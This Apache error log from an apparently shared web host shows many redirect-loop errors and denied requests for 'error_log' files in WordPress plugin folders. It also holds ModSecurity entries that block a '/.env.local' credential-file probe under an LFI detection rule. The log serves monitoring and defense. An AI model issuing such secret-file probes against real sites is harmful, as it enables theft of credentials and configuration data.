[Mon May 11 13:17:36.316447 2026] [core:error] [pid 1254133:tid 1254157] [client 20.239.192.136:9837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:36.316480 2026] [core:error] [pid 1254133:tid 1254157] [client 20.239.192.136:9837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:36.887482 2026] [core:error] [pid 1254242:tid 1254260] [client 20.239.192.136:8285] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:36.887514 2026] [core:error] [pid 1254242:tid 1254260] [client 20.239.192.136:8285] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:37.457390 2026] [core:error] [pid 1254133:tid 1254155] [client 20.239.192.136:9792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:37.457425 2026] [core:error] [pid 1254133:tid 1254155] [client 20.239.192.136:9792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:38.038907 2026] [core:error] [pid 1254328:tid 1254353] [client 20.239.192.136:8610] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:38.038941 2026] [core:error] [pid 1254328:tid 1254353] [client 20.239.192.136:8610] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:38.632092 2026] [core:error] [pid 1254242:tid 1254250] [client 20.239.192.136:8627] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:38.632134 2026] [core:error] [pid 1254242:tid 1254250] [client 20.239.192.136:8627] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:39.209096 2026] [core:error] [pid 1254133:tid 1254159] [client 20.239.192.136:8263] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:39.209124 2026] [core:error] [pid 1254133:tid 1254159] [client 20.239.192.136:8263] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:39.899909 2026] [core:error] [pid 1256241:tid 1256270] [client 20.239.192.136:9843] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:39.899944 2026] [core:error] [pid 1256241:tid 1256270] [client 20.239.192.136:9843] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:40.540639 2026] [core:error] [pid 1254179:tid 1254200] [client 20.239.192.136:9834] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:40.540671 2026] [core:error] [pid 1254179:tid 1254200] [client 20.239.192.136:9834] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:41.107659 2026] [core:error] [pid 1254242:tid 1254254] [client 20.239.192.136:6781] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:41.107692 2026] [core:error] [pid 1254242:tid 1254254] [client 20.239.192.136:6781] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:41.708363 2026] [core:error] [pid 1254133:tid 1254141] [client 20.239.192.136:2607] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:41.708400 2026] [core:error] [pid 1254133:tid 1254141] [client 20.239.192.136:2607] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:42.332070 2026] [core:error] [pid 1254179:tid 1254181] [client 20.239.192.136:8267] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:42.332095 2026] [core:error] [pid 1254179:tid 1254181] [client 20.239.192.136:8267] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:42.989629 2026] [core:error] [pid 1256241:tid 1256265] [client 20.239.192.136:8632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:42.989661 2026] [core:error] [pid 1256241:tid 1256265] [client 20.239.192.136:8632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:43.564905 2026] [core:error] [pid 1254133:tid 1254153] [client 20.239.192.136:9050] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:43.564940 2026] [core:error] [pid 1254133:tid 1254153] [client 20.239.192.136:9050] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:44.176652 2026] [core:error] [pid 1254328:tid 1254348] [client 20.239.192.136:2915] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:44.176684 2026] [core:error] [pid 1254328:tid 1254348] [client 20.239.192.136:2915] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:44.908197 2026] [core:error] [pid 1256241:tid 1256257] [client 20.239.192.136:9056] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:44.908227 2026] [core:error] [pid 1256241:tid 1256257] [client 20.239.192.136:9056] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:45.592586 2026] [core:error] [pid 1254328:tid 1254341] [client 20.239.192.136:9061] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:45.592620 2026] [core:error] [pid 1254328:tid 1254341] [client 20.239.192.136:9061] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:46.275540 2026] [core:error] [pid 1256241:tid 1256255] [client 20.239.192.136:8599] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:46.275583 2026] [core:error] [pid 1256241:tid 1256255] [client 20.239.192.136:8599] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:46.919021 2026] [core:error] [pid 1254242:tid 1254246] [client 20.239.192.136:9037] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:46.919063 2026] [core:error] [pid 1254242:tid 1254246] [client 20.239.192.136:9037] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:47.485884 2026] [core:error] [pid 1254179:tid 1254196] [client 20.239.192.136:8625] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:47.485919 2026] [core:error] [pid 1254179:tid 1254196] [client 20.239.192.136:8625] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:48.115233 2026] [core:error] [pid 1256241:tid 1256263] [client 20.239.192.136:8285] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:48.115266 2026] [core:error] [pid 1256241:tid 1256263] [client 20.239.192.136:8285] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:48.642258 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Integrations/error_log
[Mon May 11 13:17:48.684628 2026] [core:error] [pid 1254133:tid 1254151] [client 20.239.192.136:8265] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:48.684656 2026] [core:error] [pid 1254133:tid 1254151] [client 20.239.192.136:8265] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:49.254379 2026] [core:error] [pid 1254328:tid 1254345] [client 20.239.192.136:8073] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:49.254415 2026] [core:error] [pid 1254328:tid 1254345] [client 20.239.192.136:8073] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:49.871413 2026] [core:error] [pid 1256241:tid 1256269] [client 20.239.192.136:9793] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:49.871446 2026] [core:error] [pid 1256241:tid 1256269] [client 20.239.192.136:9793] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:50.287605 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Integrations/error_log
[Mon May 11 13:17:50.445632 2026] [core:error] [pid 1254133:tid 1254143] [client 20.239.192.136:8075] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:50.445664 2026] [core:error] [pid 1254133:tid 1254143] [client 20.239.192.136:8075] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:51.065419 2026] [core:error] [pid 1254328:tid 1254344] [client 20.239.192.136:8588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:51.065456 2026] [core:error] [pid 1254328:tid 1254344] [client 20.239.192.136:8588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:58.308337 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Logging/error_log
[Mon May 11 13:17:59.765458 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Logging/error_log
[Mon May 11 13:18:01.491984 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Logging/error_log
[Mon May 11 13:18:03.152147 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Logging/error_log
[Mon May 11 13:18:11.015644 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Orders/error_log
[Mon May 11 13:18:12.229459 2026] [autoindex:error] [pid 1254133:tid 1254140] [client 69.5.169.152:13606] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 13:18:12.290209 2026] [:error] [pid 1254328:tid 1254336] [client 69.5.169.206:12582] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 13:18:12.646808 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Orders/error_log
[Mon May 11 13:18:14.102098 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Orders/error_log
[Mon May 11 13:18:14.576371 2026] [authz_core:error] [pid 1254179:tid 1254199] [client 52.172.142.96:2164] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/html-api/error_log
[Mon May 11 13:18:15.739925 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Orders/error_log
[Mon May 11 13:18:19.226995 2026] [authz_core:error] [pid 1254179:tid 1254199] [client 52.172.142.96:2164] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/block-bindings/error_log
[Mon May 11 13:18:21.412717 2026] [authz_core:error] [pid 1254179:tid 1254199] [client 52.172.142.96:2164] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/PHPMailer/error_log
[Mon May 11 13:18:35.834269 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/error_log
[Mon May 11 13:18:37.253941 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/error_log
[Mon May 11 13:18:38.754273 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/error_log
[Mon May 11 13:18:40.379665 2026] [authz_core:error] [pid 1254133:tid 1254135] [client 145.239.69.44:60376] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/error_log
[Mon May 11 13:19:19.977880 2026] [authz_core:error] [pid 1254133:tid 1254144] [client 145.239.69.44:54694] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/error_log
[Mon May 11 13:19:21.378444 2026] [authz_core:error] [pid 1254133:tid 1254144] [client 145.239.69.44:54694] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/error_log
[Mon May 11 13:19:22.781493 2026] [authz_core:error] [pid 1254133:tid 1254144] [client 145.239.69.44:54694] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/error_log
[Mon May 11 13:19:44.393472 2026] [security2:error] [pid 1254179:tid 1254191] [client 176.65.139.168:56774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "k06.fr"] [uri "/.env.local"] [unique_id "agG7UGS6k_SCYd1AVZrLvAAAAQo"]
[Mon May 11 13:19:44.393698 2026] [security2:error] [pid 1254179:tid 1254191] [client 176.65.139.168:56774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "k06.fr"] [uri "/.env.local"] [unique_id "agG7UGS6k_SCYd1AVZrLvAAAAQo"]
[Mon May 11 13:19:44.393931 2026] [security2:error] [pid 1254179:tid 1254191] [client 176.65.139.168:56774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "k06.fr"] [uri "/.env.local"] [unique_id "agG7UGS6k_SCYd1AVZrLvAAAAQo"]
[Mon May 11 13:20:03.954743 2026] [security2:error] [pid 1254133:tid 1254144] [client 43.165.7.132:46678] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agG7YxjZymfuKpjWXeiXPAAAAMg"]
[Mon May 11 13:20:06.962748 2026] [security2:error] [pid 1254179:tid 1254187] [client 43.165.7.132:48024] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agG7ZmS6k_SCYd1AVZrL4QAAAQY"], referer: http://www.castiglionecf.com
[Mon May 11 13:20:09.894188 2026] [security2:error] [pid 1256241:tid 1256256] [client 43.165.7.132:48450] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agG7aZkIEwRJMyDaV55n5AAAAUo"], referer: https://www.castiglionecf.com/
[Mon May 11 13:20:10.745414 2026] [core:error] [pid 1254242:tid 1254263] [client 20.151.0.198:14870] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:10.745441 2026] [core:error] [pid 1254242:tid 1254263] [client 20.151.0.198:14870] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:13.515289 2026] [core:error] [pid 1254179:tid 1254181] [client 20.151.0.198:44727] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:13.515315 2026] [core:error] [pid 1254179:tid 1254181] [client 20.151.0.198:44727] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:16.476300 2026] [core:error] [pid 1256241:tid 1256248] [client 20.151.0.198:14859] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:16.476337 2026] [core:error] [pid 1256241:tid 1256248] [client 20.151.0.198:14859] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:20.569741 2026] [core:error] [pid 1254133:tid 1254158] [client 20.151.0.198:44684] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:20.569775 2026] [core:error] [pid 1254133:tid 1254158] [client 20.151.0.198:44684] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:21.275575 2026] [core:error] [pid 1254242:tid 1254260] [client 20.151.0.198:52027] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:21.275615 2026] [core:error] [pid 1254242:tid 1254260] [client 20.151.0.198:52027] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:26.197571 2026] [core:error] [pid 1254212:tid 1254231] [client 20.151.0.198:45347] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:26.197597 2026] [core:error] [pid 1254212:tid 1254231] [client 20.151.0.198:45347] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:29.725940 2026] [core:error] [pid 1254212:tid 1254226] [client 20.151.0.198:41657] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:29.725973 2026] [core:error] [pid 1254212:tid 1254226] [client 20.151.0.198:41657] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:33.400393 2026] [core:error] [pid 1254133:tid 1254156] [client 20.151.0.198:51978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:33.400420 2026] [core:error] [pid 1254133:tid 1254156] [client 20.151.0.198:51978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:35.083178 2026] [core:error] [pid 1254133:tid 1254142] [client 20.151.0.198:41600] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:35.083210 2026] [core:error] [pid 1254133:tid 1254142] [client 20.151.0.198:41600] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:40.047901 2026] [core:error] [pid 1254133:tid 1254155] [client 20.151.0.198:51970] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:40.048067 2026] [core:error] [pid 1254133:tid 1254155] [client 20.151.0.198:51970] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:42.675550 2026] [core:error] [pid 1256241:tid 1256255] [client 20.151.0.198:45353] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:42.675578 2026] [core:error] [pid 1256241:tid 1256255] [client 20.151.0.198:45353] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:45.904097 2026] [core:error] [pid 1254328:tid 1254352] [client 20.151.0.198:55227] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:45.904135 2026] [core:error] [pid 1254328:tid 1254352] [client 20.151.0.198:55227] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
